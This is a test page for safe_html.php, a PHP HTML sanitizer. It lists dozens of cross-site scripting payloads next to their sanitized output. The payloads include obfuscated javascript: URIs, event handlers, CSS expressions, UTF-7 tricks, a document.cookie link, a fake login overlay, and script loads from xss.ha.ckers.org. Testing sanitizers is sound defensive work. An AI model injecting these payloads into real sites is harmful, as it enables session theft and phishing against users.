safe_html.php standard tests

For more documentation, source code, and demonstration see the safe_html.php homepage.

Instructions In general, if you don’t see any JavaScript alert boxes while viewing this page, and this message is visible, then all tests have been successful.

Text in blue is rendered html as sanitized by safe_html(). Text in red is original markup. Text in green is sanitized markup.

Running Tests Now

I think javascript:foo() is the best method.
I think <em>javascript:foo()</em> is the best method.
I think <em>javascript:foo()</em> is the best method.<!-- safe_html.php/0.6 -->

I think you should click this.
I think <a href="javascript:alert(document.cookie);">you should click this</a>.
I think you should click this.

Experiencing technical difficulties, click here to re-try.

<p style="position: absolute; top: 0px; left: 0px;
width: 98%; height: 98%;
background-color: white;">
Experiencing technical difficulties,
<a href="http://10.0.17.128/?action=login">click here to re-try</a>.
</p>
<p >
Experiencing technical difficulties,
<a href="http://10.0.17.128/?action=login">click here to re-try</a>.
</p><!-- safe_html.php/0.6 -->

Let's break all other links!
Let's break <a href="http://google.com/">all other links!
Let's break <a href="http://google.com/">all other links!</a><!-- safe_html.php/0.6 -->

Encoded entities are not javascript.
Encoded entities are not &#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;.
Encoded entities are not &#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;.<!-- safe_html.php/0.6 -->

<IMG src="java<script>:alert(123)" "><SCRIPT>alert("XSS")</SCRIPT>">
<!--xss stripped after processing-->

'';!--"=&{()}
'';!--"<XSS>=&{()}
'';!--"=&{()}<!-- safe_html.php/0.6 -->

<IMG SRC="javascript:alert('XSS');">

<IMG SRC=javascript:alert('XSS')>

<IMG SRC=JaVaScRiPt:alert('XSS')>

<IMG SRC=javascript:alert(&quot;XSS&quot;)>

<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41>

<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>

<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>

<IMG SRC="javascri&#x09;pt:alert('XSS');">

<IMG SRC="javascri&#x0A;pt:alert('XSS');">

<IMG SRC="javascri&#x0D;pt:alert('XSS');">

<IMG
SRC
=
j
a
v
a
s
c
r
i
p
t
:
a
l
e
r
t
(
'
X
S
S
'
)
"
>

<IMG SRC=javascript:alert("XSS")>

alert("XSS")
<SCRIPT>alert("XSS")</SCRIPT>
alert("XSS")<!-- safe_html.php/0.6 -->

<IMG SRC=" javascript:alert('XSS');">

a=/XSS/ alert(a.source)
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>
a=/XSS/
alert(a.source)<!-- safe_html.php/0.6 -->

<BODY BACKGROUND="javascript:alert('XSS')">

<img src="/icons/image2.gif" ONLOAD=alert('XSS')>
<img src="/icons/image2.gif" <!-- safe_html.php/0.6 -->

<img src="/icons/image2.gif" oNLoad="alert('XSS')">
<img src="/icons/image2.gif" ><!-- safe_html.php/0.6 -->

<img src="/icons/image2.gif" onload='alert("XSS")' >
<img src="/icons/image2.gif" ><!-- safe_html.php/0.6 -->

<img src="/icons/image2.gif" FSCommand=alert('XSS')>
<img src="/icons/image2.gif" <!-- safe_html.php/0.6 -->

<img src="/icons/image2.gif" seekSegmentTime="alert('XSS')">
<img src="/icons/image2.gif" ><!-- safe_html.php/0.6 -->

<IMG DYNSRC="javascript:alert('XSS')">

<IMG LOWSRC="javascript:alert('XSS')">

<BGSOUND SRC="javascript:alert('XSS');">


<BR SIZE="&{alert('XSS')}">
<BR SIZE="&{alert('XSS')}"><!-- safe_html.php/0.6 -->

<LAYER SRC="http://xss.ha.ckers.org/a.js"></layer>
<!-- safe_html.php/0.6 -->

<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

<IMG SRC='vbscript:msgbox("XSS")'>

<IMG SRC="mocha:[code]">
<IMG SRC="mocha:[code]"><!-- safe_html.php/0.6 -->

<IMG SRC="livescript:[code]">

<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">

<IFRAME SRC=javascript:alert('XSS')></IFRAME>

<FRAMESET><FRAME SRC=javascript:alert('XSS')></FRAME></FRAMESET>

<TABLE BACKGROUND="javascript:alert('XSS')">

<DIV STYLE="background-image: url(javascript:alert('XSS'))">

<DIV STYLE="behaviour: url('http://xss.ha.ckers.org/exploit.htc');">
<!-- safe_html.php/0.6 -->

<DIV STYLE="width: expression(alert('XSS'));">
<!-- safe_html.php/0.6 -->

@im\port'\ja\vasc\ript:alert("XSS")';
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
@im\port'\ja\vasc\ript:alert("XSS")';<!-- safe_html.php/0.6 -->

<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS')")}</STYLE>
<!-- safe_html.php/0.6 -->

<IMG STYLE='no\xss:noxss("/*");
xss:ex/*XSS*/pression(alert("XSS"))'>
<IMG ><!-- safe_html.php/0.6 -->

alert('XSS');
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
alert('XSS');<!-- safe_html.php/0.6 -->

BODY{background:url("javascript:alert('XSS')")}
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
BODY{background:url("javascript:alert('XSS')")}

<BASE HREF="javascript:alert('XSS');//">

<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
<!-- safe_html.php/0.6 -->

<XML SRC="javascript:alert('XSS');">

<SCRIPT SRC="http://xss.ha.ckers.org/xss.jpg"></SCRIPT>
<!-- safe_html.php/0.6 -->

<IMG SRC="javascript:alert('XSS')"

<!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://xss.ha.ckers.org/a.js></SCRIPT>'"-->
<!-- safe_html.php/0.6 -->

<? echo('<SCR)'; echo('IPT>alert("XSS")</SCRIPT>'); ?>
<!-- safe_html.php/0.6 -->

+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-<!-- safe_html.php/0.6 -->

<SCRIPT a=">" SRC="http://xss.ha.ckers.org/a.js"></SCRIPT>
<!-- safe_html.php/0.6 -->

<SCRIPT =">" SRC="http://xss.ha.ckers.org/a.js"></SCRIPT>
<!-- safe_html.php/0.6 -->

<SCRIPT a=">" '' SRC="http://xss.ha.ckers.org/a.js"></SCRIPT>
<!-- safe_html.php/0.6 -->

<SCRIPT "a='>'" SRC="http://xss.ha.ckers.org/a.js"></SCRIPT>
<!-- safe_html.php/0.6 -->

document.write("
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://xss.ha.ckers.org/a.js"></SCRIPT>
document.write("<!-- safe_html.php/0.6 -->

Run the tests again, but without safe_html() support to see what happens (but don’t blame me if it crashes your browser...)